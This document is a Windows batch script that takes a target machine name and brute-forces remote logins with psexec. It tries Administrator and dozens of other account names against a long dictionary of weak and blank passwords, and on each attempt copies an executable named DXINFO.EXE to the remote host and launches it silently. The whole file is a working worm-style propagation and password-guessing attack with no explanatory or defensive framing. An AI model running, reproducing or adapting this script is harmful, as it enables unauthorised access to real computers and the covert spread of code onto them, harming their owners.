@echo off
psexec \\%1 -u Administrator -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u administrator -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p firewall -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p 123 -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p 1234 -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p 12345 -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p 123456 -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p 1234567 -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p 12345678 -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p 1029384756 -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p 2000 -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p 2001 -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p 2002 -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p 2003 -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p zzzzzz -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p zzzzz -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p zzzz -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p aaaaaa -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p aaaaa -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p aaaa -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p xxxxxx -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p xxxxx -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p xxxx -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p pass123 -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p something -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p mypass -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p login -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p access -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p password -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p matrix -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p security -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p success -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p special -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p ultra -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p pass -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p enable -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p passwd -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p password -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p tech -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p support -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p sql -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p temp123 -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p test123 -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p database -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p admin -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p administrator -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p Administrator -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p Admin -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p internet -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p network -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p edu -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p owner -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p local -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p remote -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p lan -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p root -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p secret -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p oracle -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p sword -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p sex -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p beta -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p test -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p server -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p windows -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p computer -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p internet -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p super -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p teen -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p alpha -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p user -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p manager -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p router -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p security -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p dragon -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p printer -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p one -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p two -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p three -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p four -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p five -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p six -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p seven -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p eight -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p nine -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p ten -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p debug -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p telnet -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p public -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p monitor -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p private -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p love -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p priv -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p prv -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p microsoft -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p default -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p rock -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p rand -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p random -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p video -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p thomas -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p trance -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p hiphop -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p dance -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p fast -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p corporate -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p winxp -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p win2000 -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p space -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p change -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p changeme -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p room -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p network -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p real -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p backup -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p office -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p student -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p user -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p temp -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p tmp -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p passport -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p monster -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p speed -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p main -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p astonia -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p test -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p enterprise -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p uptime -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p filter -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p chloe -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p emily -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p megan -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p jessica -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p sophie -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p lauren -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p charlotte -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p hannah -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p olivia -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p lucy -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p Ellie -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p amy -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p katie -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p georgia -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p rebecca -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p jack -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p kevin -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p joshua -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p james -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p daniel -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p harry -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p samuel -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p joseph -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p matthew -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p lewis -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p luke -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p oliver -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p william -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p benjamin -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p james -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p ryan -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p scott -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p alex -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p alexander -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p david -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p nicole -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p anna -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p robert -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p brandon -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p tensh1 -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p qwerty -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p asdf -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p zxcv -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p asdfzxcv -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p fux0r -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p matrix -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p classified -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p day -c -f -d DXINFO.EXE
psexec \\%1 -u Administrator -p nirvana -c -f -d DXINFO.EXE
psexec \\%1 -u Admin -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u admin -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u System -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u system -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u Tech -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u tech -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u ROOT -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u root -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u Office -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u office -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u Student -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u student -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u Mail -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u mail -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u Internet -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u internet -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u Server -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u server -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u Monitor -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u monitor -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u Printer -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u printer -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u Access -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u access -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u Network -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u network -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u Database -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u database -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u Manager -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u manager -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u Debug -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u debug -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u Telnet -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u telnet -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u LAN -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u lan -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u Local -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u local -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u Remote -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u remote -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u Security -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u security -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u Firewall -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u firewall -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u Main -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u main -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u Backup -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u backup -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u Guest -p "Guest" -c -f -d DXINFO.EXE
psexec \\%1 -u guest -p "guest" -c -f -d DXINFO.EXE
psexec \\%1 -u Guest -p "" -c -f -d DXINFO.EXE
psexec \\%1 -u guest -p "" -c -f -d DXINFO.EXE